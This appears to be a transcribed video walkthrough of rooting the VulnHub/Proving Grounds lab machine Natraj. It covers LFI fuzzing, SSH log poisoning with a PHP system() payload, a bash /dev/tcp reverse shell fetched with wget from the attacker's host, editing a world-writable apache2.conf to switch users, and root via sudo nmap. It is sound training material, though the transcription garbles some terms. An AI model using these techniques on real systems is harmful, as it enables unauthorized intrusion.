Hey, what's up everybody? Here's Matt again with another video. Today we're going to be showcasing how to root Natraj. I don't know how it's pronounced. This is a VulnHub machine that is actually also is improving grounds from offensive security, and yes, they have like an agreement or something like that, and I think this is a pretty fun box where I personally learned a lot of things. So I run my nmap scan as always. I'm not gonna be explaining what each command and parameter and flag does. You haven't seen any of my other videos, please feel free to check them out on yourself. You can, if you're on Linux, check the man pages and figure out by yourself what each flag does, right? So okay, we have SSH on port 22 and Apache on port 80. Okay, so there you go. This is the block we have in here. Natraj. In the meantime, let us run a ffuf. That is a fuzzing attack in quotation marks. Let's go with http tag t, and let's specify the buzzword to tell ffuf where we want to have the words to try. And we're going to be taking these words out from user shared, their buster, world list, directory, medium, 200 threads. Let's go with that. Now here you have a console directory, so let us go there. And well, basically this is just a gallery, some etymology depiction. Basically this guy right here is like a god, a Hindi god, or a representation for Shiva or something like that. We have a file, PHP file in here, and the first thing you want to try when you're seeing something like this, it's, well, basically let's first check it out, but we'll see that it's empty. Okay, it doesn't show anything, and it probably does some code inside. I mean, it does, but it's not being outputted, just it's being executed. But often these files have some console. Let me just file that PHP here, some arguments, right? So you can try something like this for as in test. Let's try it again. Look at this, the answers has size 0 because there's no such content. So let's filter that out. fs full for filter size 0. And we'll see if we can get any other response. Now the answer is no, we can't. Even if we end up this whole list, we won't be able to get any response. And the actual thing to get here is to try, well, what I ended up trying is I used the very same file name as an argument file, and I tried a payload, not like this because I won't get anything. This is just a matter of testing, but user share setlist. And let me go with fuzzing, LFI, no, big list. This is a custom list that I created just using every LFI list that was in setlist, plus some others present on the internet, on GitHub and all this stuff. So let's go with this, and soon enough we'll see some answers. And look at that. Apparently it's returning with actual sizes like 24, 28, 1398. So let us try that. So file equals, let's go back some directories, etc sled. And look at that. Let me just Control U to see it clearer. And there you go. It looks like we have some users like Natraj and Mahakal. Interesting. And yes, now this an LFI vulnerability isn't as relevant as some others. So in order to make it relevant, we have to achieve a remote code execution. The way we can do that is finding some logs in which we can poison to run commands. How is that? We can try searching for var log apache 2 access.log, and that's the one file from Apache. That's the log file. That's the most common one. Sometimes it is not Apache 2 but just Apache. It doesn't work either. And sometimes this just won't show up. Now we can try with SSH. So we have auth.log, and look at that. We have information, actual information now. Let's try to do that. Let's poison. I'm gonna be poisoning the username field. Okay, so I can go ahead and create some PHP code. This is the very basic syntax. Now I'm gonna be using system function to execute my commands. Now, how is this construct? I'm gonna be executing whatever it comes via GET request, but I have to receive a parameter, which is CMD. Once I do that, and I'm gonna be using yes, I'm gonna be failing it. And after 3 attempts, I got permission denied, and I should be able to see it here. And look at that, invalid user. There's a blank space here from my IP and port, whatever. What can we do with this? Well, we can append another parameter and run ID, for example. And look at that. We do have remote command execution. Fail the password for invalid user and our command. www.data. That's the output of the command ID, in case you didn't know. So that's cool. Now I'd like to try to use this here and burp sheet over burp sheet, because it's easier to encode and decode and all the stuff. Let me go with that. So let me Control R to send it over to the repeater. Let us just try it again to see if we can have the actual thing. Let me use here auto scroll to match when text changes and invalid user. There you go. So every time we send it, even if we're on top here, it will be scrolled down automatically. Cool. So what I'd like to try now is try to figure out whether we have .get, or yes, we have .get and we have curl. Do we? Apparently not. We're not seeing any output. So we can use .get. We will have to do something different here. But in the meantime, let us just go to exploits and create an index.html file that we will be treating it as shell script file. So bin bash and then bin bash c bash I for interactive mode and dev TCP 192. Let me check my IP. 192.168.37.183 4444, and there you go. Now we fire up a HTTP server, and what I try now is go again with this 37.183 port 8000, just like that. And in order, .get by default downloads the content. If we want just to be the output result, we can append a dash, capital O and a dash. Now we can select all this and Control U to URL encode it, and we will see something interesting. Fail password for NR script. Obviously, we will see our GET request in here, execute it several times, and that will be enough to pipe it to our bash. that will be effectively giving us a shell, right? So let me send it with Control plus space, and there you go. Now let me just neutralize it, like stabilize it. Bash stty raw minus echo semicolon fg for ground, reset it. Oh, I mean reset xterm. I don't know if that will export term as xterm. Cool. I mean, I failed it in there, but at the end I nailed it. So there you go. So let me cut that file, php file.php file out. I will see that it's using the include statement, and since there is not any kind of sanitization in there, obviously we can go back a few directories and view and execute the file we can access to. That's the reason why the vulnerability works, right? So in here, nothing really. Cool. So at this point, obviously you will want to enumerate manually, but I'm gonna be transferring to this machine, and actually I can do something like this to execute it on memory. So I can, again, 192.168.37, 183, 8000, limppeas.sh, and if I do this same as before, I will be getting the output. Now I can bash here, right? Bash, and I will be executing it. I won't be executing it on disk, just on memory, because I'm not downloaded anything, right? But we'll see what can we get from here. Super interesting. Let me zoom it up. Yeah, actually let me use -q just to avoid some downloading. I mean, I don't know if you guys saw the progress bar right there, like downloading the contents of the file. So yeah. Cool, there you go. Now, look at this. Interesting writable files owned by me or writable by everyone, not in home. And look at this. This is not common. Obviously, you won't know this unless you have previously worked with Apache 2.conf file. But this file actually have a default permission, which is 644. And we touch test, and we assign it 644 to test. We will see the actual permissions that this file should have, which is always it's owned by root, right, and group as root. So if we're others, we will be able only to read it, but never to modify it or execute it. Now, let me check what actual permissions we do have here. Now look at this. We have a 777, which is write execute for literally everyone, which is a bad thing. Now, why is this important? Let me use stt rows 45 and columns 89 just to adjust my screen. Otherwise, you will be seeing something like this, right? And kind of buggy. Now I can freely extend my lines as my screen is. Okay. So let me nano and go with this, enter, and look at that. Let me go back in here because I want to explain something right here. These are the, these are the lines that defines what user Apache runs as. Now this is actually getting the contents from this one, etc apache 2 and vars. We will see it later, which actually can be visualized, or well, I mean, this file actually sets the environment variables that we have in here. env, you will see that apache run group data and run user data. Now this is the file that defines it. Now let me grep out the hash sign and then grep that to remove blank spaces and all that stuff. Look at that. So unset home and run user data. Okay, so what about if we can make Apache run, I mean, what if we can have Apache run as another user, such as Natraj or MyHackle? I already tried Natraj as a root and it didn't work, so we need to try with MyHackle, right? So let me go again in nano. There you go. Where is it? Here. So MyHackle. Let me remove this. And right here again. And cool. Now we should, as of now, we should restart the service, but we can, unfortunately, because we are data. We're not a root. Okay, but what is the way we can get a reverse shell, for example, or a shell or whatever? We can file read file, write files, whatever, as that user we specified in there. Well, indeed, through a reverse shell, a PHP reverse shell, right? Now we can, for example, I'm giving you an idea, we could copy the user share web shells PHP reverse shell and modify the IP and port parameters just to have it up and running. But that would be anyway necessary, right? But what we need to do though is to restart the machine, the victim machine, right? And then run this reverse shell. This will effectively deliver us a reverse shell as MyHackle. So let me open up my HTTP server. Let me switch back to Natraj and go up here and reset. Let's go back to Kali. Let's wait a bit. Let me just reset. Let me fire up my listener again. And let me wait. Let us wait. Cool. It should work now. Let me see that. 192, 168, 37, 188. I mean, isn't this working? I mean, did it got reset? What's going on here? Let me see. Okay, so data. Okay, apparently the log just died. Got reset. So let me go again, just like that. Ast. Whatever. There you go. Let me open this up once again and reload it. And fail password for invalid user, whatever, from root. Now we should be able to get it. Let's send it. And look at that, we have a shell as my hackle. Now again, let me stabilize it. Def null c bash stty raw minus echo semicolon fg and reset xterm. Export term as xterm so that we can Control C and Control L freely. And now, very first thing a tester always does when in another user's account, sudo tag L, right? And look at that. Apparently, we can execute nmap as root. Now, from my experience, I know we can pop a shell using nmap. If you didn't know, though, you should be visiting GTFO panes. Here's the answer to your needs. So we can find the sudo like this and execute our commands like this. Obviously, it's important to understand what we're doing here. I'm going to be explaining it. And script. Okay, so it's setting a variable, dynamic variable called tf, and inside it's an mktemp, right? An mktemp that will create a temporary directory. Now it's echoing os.execute and execute bin bash to that variable. That means that will execute mktemp with this content, right? And then you execute nmap and set a script as this file that will effectively give you a shell as being sh, right? So look at that. This is the actual temp file it created. Okay, but it has that content, right? I mean, this command executes, creates temporary files with random names like this one, but with a different content, which is this one. So the script is this, and when we execute it, there you go, we're root. Now, unfortunately, and I don't know why, we can't execute. We can see what I'm writing, right? I don't know why, but we can cat root and root.txt, and look at that. We are root now, we have the flag, and I think that's a wrap. I think this was a very interesting machine. This is actually improving grounds as well from offensive security, and I can see why, because you exploit an LFI vulnerability. Easy mode, that's fine, but I think the key takeaway is that you can, you learn how to exploit or how you can take advantage of the apache2.com file. You can get a better understanding of what this file does. That's super important. I honestly didn't know what that file did before. I remember I visited sometime in an LFI vulnerability, probably just to see the contents, maybe some leaked information, some username, whatever. But I didn't know that, honestly. So yes, that was a super nice box. So that's it for all. That's it for today. I hope you guys liked it. And if you have any doubt or whatever, recommendation, critic, whatever, really, feel free to let it in the comments. I'll be open to hear it. Bye bye.